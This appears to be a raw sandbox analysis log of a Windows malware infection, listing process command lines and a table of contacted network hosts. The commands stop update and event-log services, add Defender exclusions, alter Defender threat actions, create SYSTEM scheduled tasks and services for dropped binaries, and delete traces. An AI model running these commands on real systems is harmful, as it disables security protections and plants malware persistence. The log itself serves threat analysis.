C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "WSNKISKT"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "WSNKISKT" binpath= "C:\ProgramData\wikombernizc\reakuqnanrkn.exe" start= "auto"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "WSNKISKT"
C:\ProgramData\wikombernizc\reakuqnanrkn.exe
C:\ProgramData\wikombernizc\reakuqnanrkn.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ZmzskowerwXEonlG" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ZmzskowerwXEonlG" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ZmzskowerwXEonlG" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ZmzskowerwXEonlG" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ZmzskowerwXEonlG" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ZmzskowerwXEonlG" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ZmzskowerwXEonlG" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ZmzskowerwXEonlG" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\cmd.exe
cmd /C copy nul "C:\Windows\Temp\ZmzskowerwXEonlG\KjJfcbDa\LOgLjqWIJXAWvdRA.wsf"
C:\Windows\SysWOW64\wscript.exe
wscript "C:\Windows\Temp\ZmzskowerwXEonlG\KjJfcbDa\LOgLjqWIJXAWvdRA.wsf"
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JipyTrDkU" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JipyTrDkU" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YLgKyOFzWxOqC" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YLgKyOFzWxOqC" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\krdeMCnRKomDOvwVunR" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\krdeMCnRKomDOvwVunR" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nFLFFjqrQPUn" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nFLFFjqrQPUn" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tegRANPZONsU2" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tegRANPZONsU2" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\fcblnlcRRSrBhAVB" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\fcblnlcRRSrBhAVB" /t REG_DWORD /d 0 /reg:64
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-26694181528797200-1526738555-78112907360430587-315284680-20279855231002641450"
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\SiHRhjyUhlpwxPXaT" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\SiHRhjyUhlpwxPXaT" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ZmzskowerwXEonlG" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ZmzskowerwXEonlG" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JipyTrDkU" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JipyTrDkU" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YLgKyOFzWxOqC" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YLgKyOFzWxOqC" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\krdeMCnRKomDOvwVunR" /t REG_DWORD /d 0 /reg:32
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-2013783795-1977407707-749609603-16962389531498428650-7803945832126342960-745057819"
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\krdeMCnRKomDOvwVunR" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nFLFFjqrQPUn" /t REG_DWORD /d 0 /reg:32
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1715074521-1816700599-278767022199165673-208235458416587270981464026766-1108294733"
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nFLFFjqrQPUn" /t REG_DWORD /d 0 /reg:64
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-1560216756-13012286731662790919828703264168664930915967371101419895698-284022166"
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tegRANPZONsU2" /t REG_DWORD /d 0 /reg:32
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "70842368318089539692900895271927735460-144235830718737379-501030014340554590"
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tegRANPZONsU2" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\fcblnlcRRSrBhAVB" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\fcblnlcRRSrBhAVB" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\SiHRhjyUhlpwxPXaT" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\SiHRhjyUhlpwxPXaT" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ZmzskowerwXEonlG" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ZmzskowerwXEonlG" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "WKALCIrwIEiqhKBsn" /SC once /ST 04:22:25 /RU "SYSTEM" /TR "\"C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\vkRKhCx.exe\" y7 /fWjNdidIY 385118 /S" /V1 /F
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "WKALCIrwIEiqhKBsn"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2804 -s 640
C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\vkRKhCx.exe
C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\vkRKhCx.exe y7 /fWjNdidIY 385118 /S
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
C:\Windows\SysWOW64\cmd.exe
/C powershell start-process -WindowStyle Hidden gpupdate.exe /force
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell start-process -WindowStyle Hidden gpupdate.exe /force
C:\Windows\SysWOW64\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "bqGGCwwWIommTRgeuN"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True" &
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\JipyTrDkU\xnVyXp.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "jiLwFdOzPPQiWLm" /V1 /F
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True"
C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
C:\Users\Admin\AppData\Local\Temp\1000031001\Newoff.exe
C:\Users\Admin\AppData\Local\Temp\1000031001\Newoff.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c start "" "C:\ProgramData\FHIJJJKKJJ.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\336473\Rent.pif" & rd /s /q "C:\ProgramData\AEHIECAFCGDB" & exit
C:\Windows\SysWOW64\timeout.exe
timeout /t 10
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "jiLwFdOzPPQiWLm2" /F /xml "C:\Program Files (x86)\JipyTrDkU\MqeBPti.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "jiLwFdOzPPQiWLm"
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "jiLwFdOzPPQiWLm"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "EyAjTIEydjCaoB" /F /xml "C:\Program Files (x86)\tegRANPZONsU2\NzKMmiA.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "nwujZhVsLEYxr2" /F /xml "C:\ProgramData\fcblnlcRRSrBhAVB\bTIYNRk.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "njgsfWmNUCIAXOmvm2" /F /xml "C:\Program Files (x86)\krdeMCnRKomDOvwVunR\wLOQGtV.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "ZXdYLGWImophNcyfuyr2" /F /xml "C:\Program Files (x86)\YLgKyOFzWxOqC\aWRXrBD.xml" /RU "SYSTEM"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "QdCYtDviHOrgqJLgZ" /SC once /ST 01:06:18 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\ZmzskowerwXEonlG\ZyVatiKe\QiTgUSq.dll\",#1 /AKYdidF 385118" /V1 /F
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "QdCYtDviHOrgqJLgZ"
C:\Windows\system32\rundll32.EXE
C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\ZmzskowerwXEonlG\ZyVatiKe\QiTgUSq.dll",#1 /AKYdidF 385118
C:\Windows\SysWOW64\rundll32.exe
C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\ZmzskowerwXEonlG\ZyVatiKe\QiTgUSq.dll",#1 /AKYdidF 385118
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1724 -s 528
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "WKALCIrwIEiqhKBsn"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2832 -s 1560
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "QdCYtDviHOrgqJLgZ"
C:\Users\Admin\Pictures\360TS_Setup.exe
"C:\Users\Admin\Pictures\360TS_Setup.exe" /c:WW.Marketator.CPI20230405 /pmode:2 /s /promo:eyJib290dGltZSI6IjciLCJtZWRhbCI6IjciLCJuZXdzIjoiMCIsIm9wZXJhIjoiNyIsIm9wZXJhX2lucyI6IjAiLCJwb3B1cCI6IjciLCJyZW1pbmRlciI6IjciLCJ1cGdyYWRlX25vdyI6IjAifQo=
C:\Program Files (x86)\1717086197_0\360TS_Setup.exe
"C:\Program Files (x86)\1717086197_0\360TS_Setup.exe" /c:WW.Marketator.CPI20230405 /pmode:2 /s /promo:eyJib290dGltZSI6IjciLCJtZWRhbCI6IjciLCJuZXdzIjoiMCIsIm9wZXJhIjoiNyIsIm9wZXJhX2lucyI6IjAiLCJwb3B1cCI6IjciLCJyZW1pbmRlciI6IjciLCJ1cGdyYWRlX25vdyI6IjAifQo= /TSinstall
Network
| Country | Destination | Domain | Proto |
| RU | 147.45.47.70:80 | 147.45.47.70 | tcp |
| RU | 185.215.113.67:40960 | tcp | |
| DE | 185.172.128.19:80 | 185.172.128.19 | tcp |
| DE | 185.172.128.19:80 | 185.172.128.19 | tcp |
| US | 8.8.8.8:53 | okkolus.com | udp |
| US | 8.8.8.8:53 | yip.su | udp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.21.79.77:443 | yip.su | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| DE | 185.172.128.82:80 | 185.172.128.82 | tcp |
| GB | 8.208.15.65:80 | 8.208.15.65 | tcp |
| US | 8.8.8.8:53 | gigapub.ma | udp |
| US | 8.8.8.8:53 | f000.backblazeb2.com | udp |
| RU | 5.42.66.47:80 | 5.42.66.47 | tcp |
| RU | 5.42.66.47:80 | 5.42.66.47 | tcp |
| US | 8.8.8.8:53 | free.360totalsecurity.com | udp |
| US | 104.153.233.177:443 | f000.backblazeb2.com | tcp |
| FR | 51.75.247.100:443 | gigapub.ma | tcp |
| NL | 151.236.127.172:443 | free.360totalsecurity.com | tcp |
| US | 8.8.8.8:53 | st.p.360safe.com | udp |
| US | 8.8.8.8:53 | s.360safe.com | udp |
| US | 8.8.8.8:53 | iup.360safe.com | udp |
| US | 8.8.8.8:53 | tr.p.360safe.com | udp |
| IE | 54.77.42.29:3478 | st.p.360safe.com | udp |
| IE | 54.77.42.29:3478 | st.p.360safe.com | udp |
| IE | 54.76.174.118:80 | tr.p.360safe.com | udp |
| DE | 52.29.179.141:80 | s.360safe.com | tcp |
| DE | 52.29.179.141:80 | s.360safe.com | tcp |
| NL | 151.236.127.172:80 | iup.360safe.com | tcp |
| NL | 151.236.127.172:80 | iup.360safe.com | tcp |
| NL | 151.236.127.172:80 | iup.360safe.com | tcp |
| NL | 151.236.127.172:80 | iup.360safe.com | tcp |
| NL | 151.236.127.172:80 | iup.360safe.com | tcp |
| NL | 151.236.127.172:80 | iup.360safe.com | tcp |
| US | 8.8.8.8:53 | int.down.360safe.com | udp |
| US | 8.8.8.8:53 | sd.p.360safe.com | udp |
| US | 104.192.108.20:80 | int.down.360safe.com | tcp |
| US | 104.192.108.17:80 | int.down.360safe.com | tcp |
| US | 104.192.108.21:80 | int.down.360safe.com | tcp |
| US | 104.192.108.21:80 | int.down.360safe.com | tcp |
| US | 104.192.108.17:80 | int.down.360safe.com | tcp |
| FR | 18.164.55.163:80 | sd.p.360safe.com | tcp |
| US | 104.192.108.20:80 | int.down.360safe.com | tcp |
| DE | 52.29.179.141:80 | s.360safe.com | tcp |
| US | 8.8.8.8:53 | bitbucket.org | udp |
| AU | 104.192.141.1:443 | bitbucket.org | tcp |
| US | 8.8.8.8:53 | bbuseruploads.s3.amazonaws.com | udp |
| US | 3.5.17.152:443 | bbuseruploads.s3.amazonaws.com | tcp |
| US | 8.8.8.8:53 | dcxZfVrOkE.dcxZfVrOkE | udp |
| RU | 5.42.66.10:80 | 5.42.66.10 | tcp |
| US | 8.8.8.8:53 | api.myip.com | udp |
| US | 172.67.75.163:443 | api.myip.com | tcp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| IE | 2.18.24.16:80 | apps.identrust.com | tcp |
| US | 104.192.108.17:80 | int.down.360safe.com | tcp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.186.192:443 | ipinfo.io | tcp |
| US | 34.117.186.192:443 | ipinfo.io | tcp |
| US | 104.192.108.20:80 | int.down.360safe.com | tcp |
